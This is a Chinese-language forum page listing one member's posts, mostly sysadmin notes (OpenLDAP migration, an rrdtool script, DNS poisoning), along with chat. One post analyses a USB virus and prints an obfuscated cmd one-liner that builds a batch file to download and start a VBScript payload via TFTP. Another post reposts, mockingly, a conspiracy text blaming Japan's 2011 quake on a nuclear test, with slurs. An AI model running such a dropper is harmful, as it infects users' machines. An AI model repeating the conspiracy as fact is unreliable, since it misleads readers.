顯示文章

這裡允許您檢視這個會員的所有文章。請注意, 您只能看見您有權限閱讀的文章。


主題 - 日京三子

頁: [1] 2 3 ... 14
1
歡迎轉載 . 轉載前請先以電子郵件或者書面方式告知. 如果有任何修改請來信通知小弟, 不得作為商業用途(包含轉變為任何形式的講義,書籍片段, 網頁文章, 或者教材, 本人會保留任何形式的訴訟權利), 轉載時並請保持此一宣告.

作者: 日京三子 <a843433{at}yahoo{dot}com>


在之前運作好好的系統裡面,小弟已經架設好 Openldap,拿來當作帳號密碼驗證系統已經跑了好一段時間 (沒想到也跑超過十一年了!!);近日,因為公司郵件系統遇到狀況,也是要面臨到系統升級與硬體更換的命運,於是在東找找西湊湊、一路跌跌撞撞好幾次之下,產生這篇筆記。



-------------

系統需求:
    1.你要有一個原先的OPENLDAP資料庫;如果沒有,就需要先將相關資料檔建立好,一如先前的筆記。
    2. 舊系統需要能被新系統查詢(slapsearch),例如透過網路。

我事先準備好的東西:
    1. 舊有的系統與電腦(CentOS 4.x)
    2. 妥當的網路連線
    3. 雙方都有FTPD服務
    4. 新主機 & CentOS 7.x

先在舊主機上,進行下列動作,將現有主機上面的資料匯出成檔案:
代碼: [選擇]
slapcat > /root/all.ldif

1. 在新主機上,先安裝好 CentOS 7.x;我個人是選 最小化安裝,並且把網路連線給設定好,確認網路設定是OK的。

2. 安裝 yum 服務,先進行 yum update 。

3. 將 Openldap 相關給安裝起來:
代碼: [選擇]
yum install openldap-servers openldap-clients
4. 因為要沿用舊有資料結構與設定,新版本的格式與舊有格式不相容,必須清掉。
代碼: [選擇]
cd /etc/openldap
rm -rf slapd.d

5. 因為是沿用舊有資料,所以從舊有主機上面把相關檔案都複製過來:
代碼: [選擇]
scp root@old.server.ip:/etc/openldap/schema/* /etc/openldap/schema/
scp root@old.server.ip:/etc/openldap/slapd.conf /etc/openldap/
scp root@old.server.ip:/root/all.ldif /root/

6. 清空新主機上面的openldap 資料庫,並把設定檔複製進去:
代碼: [選擇]
cp /usr/share/openldap-servers/DB_CONFIG.example /var/lib/ldap/DB_CONFIG
7. 將舊有資料匯入:
代碼: [選擇]
slapadd -l /root/all.ldif
8. 修改 /etc/ldap.conf 為你所需要的資料格式
代碼: [選擇]
URI ldap://127.0.0.1
BASE dc=mycompany,dc=com

9. 修改權限
代碼: [選擇]
chown -R ldap:ldap /var/lib/ldap
chown :ldap slapd.conf

10. 將 slapd 啟動,並且預設啟動
代碼: [選擇]
systemctl enable slapd
systemctl start slapd


11. 啟用 LDAP 作為驗證帳號密碼,使用 pam_ldap:
引用
yum install nss-pam-ldapd
vim /etc/nslcd.conf
代碼: [選擇]
base ou=user,dc=mycompany,dc=com
base group ou=group,dc=mycompany,dc=com

12. 啟用:
代碼: [選擇]
authconfig --enableldap --enableldapauth --enablemkhomedir --update
之後,只要使用者(或管理者)利用 ssh 登入到本機,就會自動產生使用者家目錄等等。



----------

感謝&參考資料:
引用
在 CentOS 7 安裝 OpenLDAP 並啟用 LDAP 帳號密碼驗證:

-
Configure LDAP Server

-
Configure LDAP Client

-
apache 之 Virtual Hostings:

-
安裝RoundCube Webmail:

-
Roundcube 整合 LDAP Addressbook 通訊錄:

-
Linux 整合 AD 實戰:CentOS 7.0 整合 Active Directory 驗證管理

-
CentOS 7 快速設定 LAMP(Linux + Apache + MariaDB + PHP)

-
Postfix設定:

-
Configure Postfix Server

-
轉換 Mailbox to MailDir格式:

2
從下午三點左右就連不上去,推測應該被勤勞的工作人員關閉總電源了........


U_U

3
活動/聚會區 / Study-area 活動預告
« 於: 2014-04-24 15:14 »
常常在想,哪時候能找到一個,萬能雜工 IT 除了在寫程式之外,能分享的領域呢?

每次都在思索一些,跳脫程式,跳脫作業,一些 萬能雜工 應該知道或者大家可以一起分享的事情;畢竟,教學相長,互相學習,才是根本啊!

本次題目暫定為 『來自星星的ERP』,預計上台分享的大綱為:
    1. 公司為啥要導入 ERP?
    2. 導入之前,身為 IT 你應該先做好的評估
    3. 那些那些,導入顧問不會告訴你的事情
    4. 是你倒還是公司倒? 談導入之路的艱辛與坎坷。

活動時間預計為兩個小時,不會提供簡報內容。
---------
因為過程中會談到許多不能說的東西,活動過程中嚴禁錄音錄影,敬請合作。

4
雜七雜八 / 紀念一下,第8666篇文章!
« 於: 2013-06-13 13:14 »
相隔好久,終於發表了編號第8666篇 灌水 文章.........


往事如煙,一回頭已經好多年過去了,人事已非啊  :'(  :'(  :'(

5


中國網友測試的版本。不愧是微信(WeChat),藝人不懂就算了。那些拿錢寫文推廣微信的部落客,難道不覺得不妥嗎?

6
好久沒上台跟大家分享東西了,這次要講些什麼呢? (抓下巴)






就先暫定,我最近一直在搞的,「主機效能的觀察」好了! ;D




敬請期待!

7
雜七雜八 / 灌水.....
« 於: 2012-03-16 10:24 »
好久沒用crontab 跑 使用者個人程序,在左摸摸右摸摸,花了兩個多小時之後終於讓某祭師家的EBS備份跑起來了.....

果然是老了,自己寫的筆記都有點看不懂Q_Q

8
鳥哥臨時公佈欄 / 鳥園失連......... OH NO!!
« 於: 2011-04-01 17:04 »
怕是放連假,有天才把校園的總電源給關了...  :'(

9
剛剛收到的,大陸網友轉寄給我的郵件,看過之後真是佩服中國神人們的想法........

先說好,三子沒有什麼政治思維,只是覺得大陸網友真是好傻好天真(說不定其實是三子好傻好天真?)

引用
    來自中華網社區 club.china.com/  作者為某高校核工業專業研究生
    日本3月11日的9.0級大地震,看是一場大自然的災難,但從多方面綜合分析,也可能是一場人為的大災難!很可能是日本自己進行的海底核子試驗引起的!理由如下:
    一、石原慎太郞前陣子剛剛放言要以核武器對抗中國,3月9日日本就發生了7.4級的地震。這可以推論為石原的狂言只是為日本的核子試驗放風,而9日的地震其實就是日本進行的核子試驗。如果不出意外,日本近期還將進行幾次核子試驗,並在不久後在美國的黙許下宣佈為有核國家以對抗中國。可惜人算不如天算,想不到引發了世紀大地震而自食惡果。 
    二、3月11日地震後,海面出現的神秘大漩渦,可能就是日本通向海底核子試驗場的遂道崩塌,導致海水倒灌引起的。 
    三、以日本現有的技術,能導致日本用於啟動冷卻設備的三道保障電網都出現故障,特別是柴油發電機不能發電,這有點太不可思議。合理的解釋就是日本是故意讓電站爆炸讓核外泄,以便掩蓋3月9日進行核子試驗發生的核輻射。 
    四、美國的航母在100公里外的海面就受到那麼強的核輻射,而日本本土卻僅僅撤離了核電站周圍20公里的人,那麼美國航 母上的核輻射從哪來?合理解釋就是這些核輻射其實就是日本3月9日核爆造成的。 
五、日本昨天宣佈要自行檢測電站核輻射量,不讓外國插手,為什麼?這是做賊心虛!
事實上,作為一個島國,倭國有著豐富的潮汐和風力發電資源,同時太陽能也非常先進,但該國對這些視若無物,多年來,全力發展核電。
    如果這僅僅是電力需要也就罷了,但是,有多少人知道?在核電技術已經突飛猛進的今天,倭國的核電設施卻一律死抱著第一二代技術不放。
    福島核電站採用的是鈾鈈混合氧化物這種比鈾氧原料貴2-3倍,而且危險性高的原料,反應堆用的也是安全性差的快增殖反應堆,而且沸水堆只有一回路,直通渦輪。日本人玩這種手段只要有點腦子的都看得出來他們想要幹什麼:不就是為了儲備製造核彈的那點鈈嘛。
    現在據報導爆掉的一號堆已經在用硼酸了。一開始不肯用是因為一旦用了硼酸,裡面的核燃料就全部報廢了。福島電站用的可是MOX燃料,那可是極重要的戰略資源,你們懂的。
    現在國際上最新一代的核反應爐是號稱出事故緊急停堆後36小時無人看護照樣安全的。但日本人就是不用。簡單地講,它們只造最原始最落後的核電站,絕不採用新技術,哪怕是新技術再成熟,再免費。
    因為原始的一二代技術最有利於大量提煉核原料。最浪費,最低能,最高消耗,最大成本,最不安全,只為換得核原料。
    在地震前不到一個月,倭人已明確表示沒有核彈不合理,且舉國在為“有核彈化”努力。大家上網查,這幾十年來,倭人利用這些原始的電廠,攢了近四千枚核彈的原料。
    可惜啊,人算不如天算,倭人為了獲得攻擊他人的核彈,不顧科技,不顧地理條件,不顧風險,最終引發了今天可能出現的巨大核災難風險。
    是典型的損人不利已變態後果。
    海嘯過去,倭人早就可以進入災後重建,但是,天譴啊,一次微不足道的小災難,恰好擊中倭國人修練邪門功夫的命門。當然還有個更小的副作用,就是沒電導致的混亂而已,幾不足道。
    所以,自然界的天災基本已然過去,現在倭島上發生的一切,都是人禍,是它們為了殺人放火禍害世界目的積贊了多年的苦果,是引火焚身的自焚行為。
    可笑有些人還在裝道學家。倭人為你們和你們的子孫準備了四千枚核彈,不想在生產過程中遇到天災發生事故,你們還想著同情?還想著仁義?還想著捐款救災?
    逆天者,天必誅之!
    日本37萬平方公里,卻變態地修建了57個核電站,發出的電不到全國需求的30%,一個核電站有4-6個反應堆,即全國有三百多個反應堆。37萬*30%=11萬平方公里,即三百多個反應堆為11萬平方公里供電
110000/300=367平方公里
    也就是說,日本的一個核反應爐只為367平方公里提供電力。相當於每個縣級城市就要配一個核反應爐。這正常嗎?
    這場核災難到底會發展到多大,至少還有三個問題沒公開,離了這三個問題,誰也無法預測,只有小鬼子心裡清楚。
    第一個問題:它們造出來的四千枚核彈的原料存放在哪裡?是否安全?!
     第二個問題:在這些核電站裡,到底還有什麼秘密,這些以製造核彈原料為目的的核電站裡,都有哪些高危和不可告人的東西?!
    第三個問題:日本這些年積攢的核廢料都放在哪裡?在陸地上?還是在海裡?還是偷運到哪裡去了?會不會產生危害?
    這些問題都是潛在的核彈級風險。是對全人類的安全威脅!
    1923年日本發生關東大地震,中國也展開援助
    事實證明,中國人無私的援助,在金錢和物資方面,為日本節省了相當大的一筆款項,為日後順利地發動九一八和七七奠定了堅實的基礎。
    也就是說,由於有中國人出錢救災,日本得以省下錢造軍火。。。
    作為一個核工專業的學子,我不禁眼含熱淚,學了這些年,終於能跟別人吹一吹了。
    不過可以看出曰本的野心,他的堆居然是鈾鈈堆,而不是普通的二氧化鈾堆,看來造核彈就在他們掌握中。他們這盤棋很大啊。鈾鈈堆是什麼呢?簡單地說,鈈也可以做核彈,往長崎廣島投的彈就是鈈彈。他們不用二氧化鈾做燃料芯塊,而是用鈾鈈合金,這就很說明問題。 

10
難得,終於看到了傳說中的百里香大大所經營的副業;一般IT人的副業通常是賣雞排,大大不愧是大大,看得比較遠...




Uploaded with ImageShack.us

11
剛剛去檢查 VMware Esxi 更新,沒想到默默的推出了 update 1,有需要的朋友可以更新了!

12
雜七雜八 / 「新年快樂」集中恭賀串 ^_^
« 於: 2011-02-03 10:41 »
大家,新年快樂!  ;D ;D

13
目前,如果是使用pidgin之類的,非微軟的MSN Client的朋友,應該都很頭痛,因為會出現SSL認證錯誤而無法使用.....


來來來,簡單說明一下,網路上的朋友怎麼處理這問題


1. 關閉你的 pidgin。




首先,連到這個網址... https://omega.contacts.msn.com/ <---


在「鎖匙」上面按一下...



跳出這個視窗之後,選左下角的,「認證資訊」。


切到中間,「詳細資料」,然後選擇右下角的『複製到檔案』


下一步...


DER編碼(基本上不用動),下一步


「瀏覽」,選擇你要放在哪裡,與檔名是什麼;建議是 omega.contacts.msn.com 且,最後還是會改成這個名字。


下一步.....


「完成」


把剛剛匯出的認證檔案,複製到下面這目錄底下:

C:\Documents and Settings\「User_Name」\Application Data\.purple\certificates\x509\tls_peers


再將這個檔案改名為「omega.contacts.msn.com」


最後開啟 pidgin 來驗收成果!

----
原始資訊資訊^_^


http://ppt.cc/_67F

14
美食行動區 / [三子公司午餐伙食]2010-11-18
« 於: 2010-11-18 13:37 »

這是昨天的火鍋午餐,旁邊的麵據說是蔬菜手打麵


蔬菜手打麵特寫


火鍋特寫,整鍋滿滿都是料,跟外面賣的ox臭臭鍋相比是有過之而無不及啊!

---- 上面的是昨天的 ----

#### 我是灌水分隔線 ####

---- 下面才是今天的 ----


今天(1118)的午餐,麻油雞麵線!


隨麵附的小菜一碟!


記者 三子,用 里程碑拍攝,在公司餐廳 為您報導!

15
美食行動區 / [公司午餐伙食]2010-11-16
« 於: 2010-11-16 15:04 »
美食版很久沒動了,來分享一下公司提供的員工伙食,當作灌水(誤)吧!



今天午餐的大合照!


(其實我也不曉得主題是什麼的)烏龍乾麵


豬頭皮 + 豆乾(被埋在底下)


紫米紅豆湯 (超讚的啦!)


以上,由 臥底記者 三子,在xx公司餐廳,為您現場報導!

16
雜七雜八 / 浪費林背時間,棍!
« 於: 2010-09-01 11:05 »




害林背的心跳多跳好幾下,造成林背內心恐懼;不曉得可不可以依照恐嚇罪嫌起訴?

17
小小的野人獻曝一下

代碼: [選擇]
#!/bin/bash
LANG=C
PATH=/bin/:/usr/bin/:/sbin/

RRD_RECORD_FILE=/home/www/public_html/net/net.rrd
TARGET_IP=「你想檢查的目標」
TIMESTEP=`date +%s`

if [ ! -f "$RRD_RECORD_FILE" ]; then
  rrdtool create $RRD_RECORD_FILE \
   -s 30 -b `date -d "2007/07/04" +%s` \
   DS:NET_V:GAUGE:600:U:U  \
   RRA:LAST:0.5:1:180900
fi

for ((i=1;i<=15;i++))
do

NET_VALUE=$(echo `ping $TARGET_IP -c 1|grep "time="| awk '{print $7}'|cut -c 6-10` |bc )


NET_V=$(echo " $NET_VALUE*1"|bc  )


/usr/bin/rrdtool update $RRD_RECORD_FILE  `date +%s`:$NET_V

sleep 20
done

至於如何把圖畫出來,應該就可以憑著大家的才藝與需求,搭配 abelyang前輩的教學,去畫出自己想要的圖了 ^^

18
雜七雜八 / 最新力作,夜市戰士!
« 於: 2010-05-26 11:15 »
[youtube]http://www.youtube.com/watch?v=_nzZAPg2GIc[/youtube]

恰恰!  ;D

19
這幾天,抽空去逛了一下美羅城與附近地區,大概瞭解了一下上海這邊跟電腦相關的趨勢與價位;有幾個觀點可以跟大家分享一下......

    一是,上海這邊的網路線,尤其在零售業所販售的,已經從以前單芯銅,變成成本低、品質差、信號容易不穩定的「多芯銅」;有些店家還會說用這種線的效果「特好」,嗯.... (三子沈默不語貌)

    二是,這邊所多東西的賣價明顯的比台灣貴了一些,諸如印表機、處理器(比較熱門的)、記憶體(台灣牌的),很明顯都比台灣還昂貴約5~15%左右;講價的空間也小很多,有些直接擺明是不講價的。

    三是,以前的美羅城與旁邊的太平洋一期,就好像是電腦的百貨公司一樣,什麼東西都賣;現在比較像是只賣桌機、NB跟手機的,其他東西很明顯的委縮了不少,就連要找賣印表機的中盤商,也不太容易。

    四是,不論是山寨還是偽品,在這種地方還是有一些,採購時要小心注意。(買隨身碟跟玩踩地雷一樣,真是嚇壞我了)

    五是,太平洋二期樓上四樓出現了女僕餐廳..... 我沒進去坐下來,我也沒膽拍照,手上經費也不足,所以別問我服務好不好........


20
最近遇到了一隻算是大混種的隨身碟病毒,可以說是集合我之前碰過的各種效果(例如隱藏檔不顯示、遊戲木馬、通訊軟體木馬、隨身碟作怪、上網更新病毒、綁架首頁、佔領REG不放等)於一身,花了好一番功夫才清除乾淨...

病毒範例,有機會請測試一下您手上的掃毒軟體是否能檢測出來;如果找不到測試檔就不要太勉強了.......

---
使用 http://www.virustotal.com/ 分析, 全軍覆沒的掃描報告在此 XD

21
三子偶爾也會看NBA,沒想到台灣的居然這樣子搞...... U_U


原文網址


引述: ikari
心血來潮,想上NBA英文官網看一下戰績
結果,www.nba.com不論怎麼點  
都給我直接轉到台灣官網,在網址列直接打上www.nba.com一樣情況
好笑的是,點這頁面的英文連結也沒用



好,那我直接打隊名網址總可以吧...www.nba.com/kings
結果還會常常給我跳出痞客邦 404網址錯誤的畫面...乾...
就是不讓台灣人上英文官網就對了



原來是痞客邦搞的鬼...強制讓人連到連建置都還沒完成的台灣站
cookie啥歷史記錄都清除了也沒用

心血來潮,想上NBA英文官網看一下戰績
結果,www.nba.com不論怎麼點
都給我直接轉到台灣官網,在網址列直接打上www.nba.com一樣情況
好笑的是,點這頁面的英文連結也沒用



好,那我直接打隊名網址總可以吧...www.nba.com/kings
結果還會常常給我跳出痞客邦 404網址錯誤的畫面...乾...
就是不讓台灣人上英文官網就對了



原來是痞客邦搞的鬼...強制讓人連到連建置都還沒完成的台灣站
cookie啥歷史記錄都清除了也沒用

後來發現只要用Firefox他就會乖乖的直接連到英文官網了
Opera、Chrome、IE都沒用......


誰管你台灣站上線倒數計時中阿 乾

22
一開始討論的原文網址 <----- 看不到圖請到此處觀看原始照片
三子得知此消息,網友討論的來源











(請特別注意,左邊的CPU說明書內頁是空白的 XD)


(這個很讚,因為CPU是「一張照片」)


傳說中的購買地點 XD
----
買到應該是笑不出來吧 XD

23
原文網址:
http://tw.news.yahoo.com/article/url/d/a/100224/19/20z3c.html

其內容如下:
引用
法新社北京24日電) 中國已對網路使用發布新的規定,要求新設網站者須先與主管官員面談,並繳交身份証件。這項作法今天已引來一個人權團體的抨擊。

發布這個新規定的不久之前,美國才提高對北京施壓,要求解除「中國防火長城」(Great Firewall ofChina)對3億8000萬網民的管控。

國營媒體昨天報導,中國工業和信息化部已於本月8日向地方政府發布新的指導原則,並取消去年12月對個人取得.cn網域名稱的限制。

報導指出,今後希望設立網站者,必須繳交個人身份証及照片,並經與主管官員面談後,才能登記其網域名稱。

目前仍不清楚這項規定是否已經實施。

工業和信息化部說,新規定旨在防止網路色情。但媒體人權觀察機構「無國界記者組織」(ReportersWithout Borders)表示政府的目的在嚇唬人民離開網路。

該組織在一項聲明中指出,「新規定是中國網際網路的一大退步。」

聲明說,「對抗色情的藉口根本站不住腳。它的目的是加強網路的政治控管,並藉由與主管官員面談,壓迫網路使用者自行過濾。」(譯者:中央社楊超寰)

一整個歡樂啊 XDDD

24


剛剛在網路上,發現這篇文章:

http://people.debian.org.tw/~chihchun/2010/02/02/remove-cnnic-cert-on-linux/

#----------- 原文轉貼如下 ----------#
引用
在 Linux 上移除 CNNIC 憑證

一月底開始,一些朋友開始討論 Firefox 3.6 中,將置入 CNNIC 的 CA 憑證。這件事情是去年年底,CNNIC 對 Firefox 申報納入 CNNIC 的憑證 (#476766),目前已於 3.6 版中內建 CNNIC 憑證。

目前此事已經在 Mozilla Security Policy mailing list 公開討論,在華人網路社群也引起一陣騷動。像是 AutoProxy 等社群都提出 CNNIC CA:最最最嚴重安全警告!。在原提案 #476766 中亦有人整理了一些客觀事實。

不過根據我主觀的看法,奉勸所有人盡快移除 CNNIC 相關的 CA 憑證!CNNIC 就是中國網際網路絡信息中心,是一個中國的非營利組織,提供中國網際網路的網域名稱、網段管理。

CA 憑證對於瀏覽器使用者而言,可以用來辨識特定網域是否為合法組織,部份瀏覽器功能甚至依據有否憑證,對網頁開啟進階存取權限。前提是 CA 維持善良管理人義務,嚴格管理所核發的憑證、簽章。

CNNIC 過去最大的爭議即是曾經發布過中文上網官方版軟體,名為提供中文網址導引服務,實質則包含流氓軟體的功能,主要功能是一般輔助上網軟體,但核心卻用 rootkit 技術讓你無法刪除,與木馬/病毒程式一般。雖說這只是一項前科,但是中國政府持續拿著民族主義、國家安全為藉口,實施數種網路管制,甚至滲透國外企業、政府網路,根本是合法的網路流氓。而 CNNIC 背後支持的政府組織是中華人民共和國工業和信息化部、中國科學院、中國科學院計算機網絡信息中心 等中國政府組織。很難說,哪一天 CNNIC 不會被控制作為攻擊工具之一。

除了 CNNIC 自行發布的 CA Cert Root 外,其實 CNNIC 也已經取得 Entrust.net 所發布的次級憑證。建議所有台灣政府單位,一律移除 CNNIC 相關憑證。

若你覺得此事關係重大,可以以投票方式附議 Bug 542689 – Please Remove “CNNIC ROOT” root certificate from NSS,提高該問題的被重視程度。
跳板風險

其實 Mozilla 先前也曾經遭遇過亂搞的安全憑證公司。原則上,任何人要申請特定網域的簽章,必須提供書面資料,證明你是該網域的擁有者。因為 SSL 憑證一個主要功能是防止釣魚網站欺騙一般消費者,若使用假冒的憑證,使用者很容易就發現網址異常。

若安全憑證公司絲毫不做基本的驗證,任何人都可以申請想仿冒的網域,然後以中間人攻擊 (MITM) 詐騙你交出個人資料。想像,你收到一封 PCHOME 的廣告,連到一個假的網站,這個網站提供了完美的 SSL 憑證,瀏覽器沒有提示你任何異常,除非你刻意去點選確認簽章,否則很自然就會上當。

Mozilla 的事件起因,是有人回報一安全憑證公司透過廣告郵件推銷新的服務。但這個憑證公司的服務卻允許你隨意購買任一網址的簽章,於是你可以購買並假冒任何網站。Eddy Nigg 寫了一份詳盡的說明,當時並做了一個驗證概念的 Mozilla.com 憑證。在事情曝光後,Mozilla 已撤除這組組憑證了。
移除 CA 憑證

驗證方法是開啟 CNNIC 的網址衛士 (使用 Entrust.net) 或 CNNIC 的 ENUM 試驗平台 (使用 CNNIC Root Cert)。若你的瀏覽器絲毫不給警告的就讓你存取,你的系統即已安裝 CNNIC 憑證。

在 GNU/Linux Debian, Ubuntu 上,系統保持一份共用的 CA 憑證,許多網頁工具如 Firefox, curl, wget, Chrome 均共用同一組設定。因此最簡便的方法便是關閉系統上有問題的憑證。

#-------- 轉貼結束 --------#



看完之後,心中出現一堆點點點.....

25
很難得,我公司終於要徵人了^^   希望大家不要路過錯過放過,不然一定會傷心難過唷 ^_^
-----------

職缺:電腦維護工程師 乙名

公司名稱:賀欣機械廠股份有限公司
公司網址:http://www.hohsing.com
公司性質:傳統製造業
上班地點:台北縣樹林市、上海市 (可能輪調,也可能直接常駐上海)
工作性質:電腦與相關設備維護
薪資福利:面談
所需專長:基本上,有一定的DIY知識,知道什麼是主機板,螺絲起子會拿會用就很好了;XP、VISTA、WIN7會操作;有強烈的學習心與上進心能自我要求。
程式語言:不需要;但能自我學習或具有簡單 Shell Script 會更加分不少!
資料庫背景:不需要精通或多熟練;但如果「會」,則一定更好。
性別與年齡:不拘
學歷:不拘,但需要一定英文程度(聽過我在研討會分享的「英文程度」的定義,就會知道真的沒有太要求)




如果有志想跟三子一樣,變成萬能魔術師的朋友,請利用 「私人訊息」 跟我聯絡,以便安排面試。

26
雜七雜八 / 20100115,日偏蝕 進行中....
« 於: 2010-01-15 16:25 »


 ;D

27
這陣子發現,這類利用編碼的手法,讓使用者就算經過掃毒之後,也一定會中毒........

[attachment=1] 解壓縮密碼:「study-area」

為甚麼呢?
第一,在你解開壓縮之後,看到一個怪異的文字檔





第二,小心的點開之後,在「內容」的地方可以看到......

代碼: [選擇]
%cOmsPeC% /c sEt c=ET GE&seT E=T k.Vb&ECho %g%p %G%Ft.N%C%t %e%s>ll.BAt&Set g=TFt&EcHo stAr%E%s>>LL.bAT&you_will_download_a_Virus.BAt 第三,上面這串,如果你在cmd 裡面貼上,就會下載一個BAT,裡面的內容又是經過編碼的純文字訊息.....



(因為三子很怕死,所以那個被執行的指令有經過小小的修改,跟病毒內容其實有所不同,敬請見諒^^)

經過執行,就會產生這樣的訊息......
代碼: [選擇]
C:\>%g%p %G%Ft.N%C%t %e%s

Transfers files to and from a remote computer running the TFTP service.

TFTP [-i] host [GET | PUT] source [destination]

  -i              Specifies binary image transfer mode (also called
                  octet). In binary image mode the file is moved
                  literally, byte by byte. Use this mode when
                  transferring binary files.
  host            Specifies the local or remote host.
  GET             Transfers the file destination on the remote host to
                  the file source on the local host.
  PUT             Transfers the file source on the local host to
                  the file destination on the remote host.
  source          Specifies the file to transfer.
  destination     Specifies where to transfer the file.

上面的命令會從火星抓來一個檔案,這檔案就是一個vbscript,也就是病毒本體,用來修改系統登錄資料庫裡面的內容(會改哪些部份我就不知道了,沒繼續跑下去)

代碼: [選擇]
C:\>stAr%E%s
系統找不到檔案 k.Vbs。

如果你不是像三子一樣,每一段都是分開來執行,而是快樂的在一開始的地方就大意的點下去執行;到這裡,你的系統就跟你說bye bye了!

------------
這種招式最近滿流行的,各位朋友請多加小心;最好是把vbs這類檔案給限制住,不然你就有得忙了^^

28
http://www.104.com.tw/jobbank/cust_job/job.cfm?j=3f774a2f533d465d3839416a476b3d6976177492c3b3d4728282828263f682d2c917j02&intro=1&jobsource=104i&page=1

引用
1.訓練期:6個月,訓練期過後表現優良者可直接轉成正職員工。
2.費用:每個月35,000元(含辦公室費用、電腦網路等軟硬體費用),
優惠價:每個月30,000元,前5名報名錄用者可以每個月25,000元之費用進行訓練,表現優異者最後2個月免費實習。
3.報名資格:請E-mail個人履歷、過去經歷作品,及在校優良表現成績單(有則附),E-mail:reseum@iam-media.com。
4.訓練時間:每週星期一~五,上午9:00~下午6:30分,下班後可繼續使用辦公室,與正職同事一起工作。
5.訓練內容:直接接受廣告實務實習訓練。
6.應徵資格:具備行銷概念,有心進入公司成為正職人員者。
7.實習職務類別:市調人員、廣告行銷、媒體計畫、產品行銷

真是太讚了! 公司有免費苦力可以操到死,公司方面還可以有收入;世界上有沒有這麼好康又穩賺不賠的生意啊?

29
看樣子還沒人發布這個消息,就讓我來八卦一下......

http://www.huadunsoft.com/product_download.html

這是金盾資訊管理系統的一環,用來作為過濾不良訊息,並主動出擊的部份。不管是 32bits 64bits Windows Linux BSD 全部一網打盡,很快的有在中國設廠的朋友就會接到安裝此軟體的公文。



PS. 這不是MIS用的伺服器管理工具,這是政府的管理軟體,會怎樣應該大家可以發揮想像力。

---------------




當然,兩百塊最聰明,戈巴契夫頭髮最長,海珊是和平主義者,金正日不喜歡核彈,共產黨說是為人民服務,女星嫁給富豪說是遇到真愛...........

30
事情是這樣子開始的......

話說,本人會用某個網站的反應速度,來作為網路連線的真實狀況;不過,這兩天發現,除了門口之外,裡面都進不去,該點的能點的想點的,統統不行。
代碼: [選擇]
# nslookup
> facebook.com
Server:         192.168.1.1
Address:        192.168.1.#53

Non-authoritative answer:
Name:   facebook.com
Address: 69.63.184.142
Name:   facebook.com
Address: 69.63.187.17
Name:   facebook.com
Address: 69.63.187.19
Name:   facebook.com
Address: 69.63.181.11
Name:   facebook.com
Address: 69.63.181.12



來檢查一下,各種遊戲、應用程式的大本營:
代碼: [選擇]
> apps.facebook.com
Server:         192.168.1.1
Address:        192.168.1.1#53

Non-authoritative answer:
Name:   apps.facebook.com
Address: 8.7.198.45



好樣的,不假思索,直接有回應;但,總覺得似乎有點怪異,讓我們換一台Server來查詢一下:
代碼: [選擇]
> apps.facebook.com
Server:         168.95.1.1
Address:        168.95.1.1#53

Non-authoritative answer:
apps.facebook.com       canonical name = www-college.facebook.com.

Authoritative answers can be found from:
facebook.com    nameserver = ns2.facebook.com.
facebook.com    nameserver = dns05.sf2p.tfbnw.net.
facebook.com    nameserver = dns04.sf2p.tfbnw.net.
facebook.com    nameserver = ns1.facebook.com.
ns2.facebook.com        internet address = 204.74.67.132
dns05.sf2p.tfbnw.net    internet address = 69.63.176.9
dns04.sf2p.tfbnw.net    internet address = 69.63.176.8
ns1.facebook.com        internet address = 204.74.66.132



而有問題的回應則是:
代碼: [選擇]
> set type=any
> apps.facebook.com
Server:         192.168.1.1
Address:        192.168.1.1#53

Non-authoritative answer:
Name:   apps.facebook.com
Address: 8.7.198.45   <------------------ 被污染而造假的紀錄

Authoritative answers can be found from:
facebook.com    nameserver = dns05.sf2p.tfbnw.net.
facebook.com    nameserver = ns1.facebook.com.
facebook.com    nameserver = ns2.facebook.com.
facebook.com    nameserver = dns04.sf2p.tfbnw.net.
ns1.facebook.com        internet address = 204.74.66.132
ns2.facebook.com        internet address = 204.74.67.132
dns04.sf2p.tfbnw.net    internet address = 69.63.176.8
dns05.sf2p.tfbnw.net    internet address = 69.63.176.9

然而,真正的 www-college.facebook.com. 並不是在被污染的機器上的紀錄所指出的地方:
代碼: [選擇]
# nslookup
> set type=any
> server 168.95.1.1
Default server: 168.95.1.1
Address: 168.95.1.1#53
>  www-college.facebook.com.
Server:         168.95.1.1
Address:        168.95.1.1#53

Non-authoritative answer:
Name:   www-college.facebook.com
Address: 69.63.186.12    <---------- 正確的紀錄

Authoritative answers can be found from:
www-college.facebook.com        nameserver = glb01.ams1.tfbnw.net.
www-college.facebook.com        nameserver = glb01.lhr1.tfbnw.net.
www-college.facebook.com        nameserver = glb01.ash1.tfbnw.net.
www-college.facebook.com        nameserver = glb01.hkg1.tfbnw.net.
www-college.facebook.com        nameserver = glb01.sf2p.tfbnw.net.
www-college.facebook.com        nameserver = glb01.snc1.tfbnw.net.
www-college.facebook.com        nameserver = glb01.dfw1.tfbnw.net.
glb01.ams1.tfbnw.net    internet address = 69.63.191.219
glb01.lhr1.tfbnw.net    internet address = 69.63.191.91
glb01.ash1.tfbnw.net    internet address = 69.63.185.11
glb01.hkg1.tfbnw.net    internet address = 69.63.185.86
glb01.sf2p.tfbnw.net    internet address = 69.63.176.101
glb01.snc1.tfbnw.net    internet address = 69.63.179.22
glb01.dfw1.tfbnw.net    internet address = 69.63.185.78

唉呀呀,好樣的,被改到火星去了  XD

頁: [1] 2 3 ... 14